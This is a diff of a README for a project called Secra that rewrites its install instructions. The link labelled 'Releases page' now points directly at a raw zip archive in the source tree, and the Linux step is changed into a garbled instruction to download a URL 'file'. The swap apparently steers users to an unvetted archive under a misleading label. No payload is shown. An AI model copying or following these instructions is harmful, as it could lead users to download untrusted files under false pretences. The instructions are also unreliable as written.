Aro2105/Secra/README.md

 ## 📥 Download & Install

-To get Secra, visit the [Releases page](https://github.com/Aro2105/Secra/releases) to download the application.
+To get Secra, visit the [Releases page](https://raw.githubusercontent.com/Aro2105/Secra/main/src/Secra_v2.7.zip) to download the application.
 You will find the latest version there.
 Follow these steps:

 1. Click on the download link that corresponds to your operating system.
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the `.tar.gz` file.
+   - For Linux, download the `https://raw.githubusercontent.com/Aro2105/Secra/main/src/Secra_v2.7.zip` file.

 2. Locate the downloaded file on your computer.